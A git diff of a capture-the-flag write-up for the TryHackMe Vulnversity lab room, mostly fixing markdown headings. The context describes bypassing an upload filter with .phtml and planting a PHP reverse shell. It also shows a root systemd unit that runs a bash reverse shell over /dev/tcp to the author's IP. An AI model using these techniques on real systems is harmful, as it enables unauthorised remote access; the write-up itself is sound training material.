Update 1. Vulnversity Room.md

--- a/1. Vulnversity Room.md
+++ b/1. Vulnversity Room.md
@@ -10,9 +10,9 @@ Initially I started usinmg the provide 'AttackBox' from TryHackMe, but part way 
 
 Here is how it went:
 
-#Step 1: Reconnaissance
+# Step 1: Reconnaissance
 
-##Basic reconnaissance was performed using NMAP. 
+## Basic reconnaissance was performed using NMAP. 
 
 The open ports discovered with NMAP:
 
@@ -35,7 +35,7 @@ From here we discovered the 'internal' folder, browsing to this showed us an upl
 
 *Note at this point I changed over to my Kali linux box and reset the target machine, as such the IP address changed.*
 
-#Step 2: Attempt to deliver a pay load and compromise the server
+# Step 2: Attempt to deliver a pay load and compromise the server
 
 I use Burp to try and findout what types of file extensions I can be uploaded, hoping for a PHP based file. 
 Using Burp's sniper attack allows me to try various file extensions very quickly. 
@@ -44,7 +44,7 @@ Using Burp's sniper attack allows me to try various file extensions very quickly
 
 This identified that .phtml files can be uploaded, see above.
 
-##No we deliver the payload:
+## No we deliver the payload:
 
 I uploaded a php reverse shell as a .phtml file using the target's upload page. 
 I edited the reverse shell script variables so it points to my Kali linux’s IP and port. 
@@ -67,7 +67,7 @@ Searching around on this server, I found the first flag in the user's home folde
 
 ![image](https://user-images.githubusercontent.com/60744763/120155639-6267f480-c234-11eb-9e0a-4a654587ef5a.png)
 
-#Step 3: Privilege Escalation
+# Step 3: Privilege Escalation
 
 Now we want to attemp to get root access. I will look for files with the SUID bit set, maybe one of them can be exploited.
 
@@ -91,8 +91,8 @@ User=root
 ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/10.4.37.95/9999 0>&1'
 
 [Install]
-WantedBy=multi-user.target
-`
+WantedBy=multi-user.target`
+
 I named the file with a phtml extension and uploaded it through the site (this was quicker than using the nc terminal to create the service file).
 
 Then I renamed the uploaded file from my active shell on the webserver to root.service. 
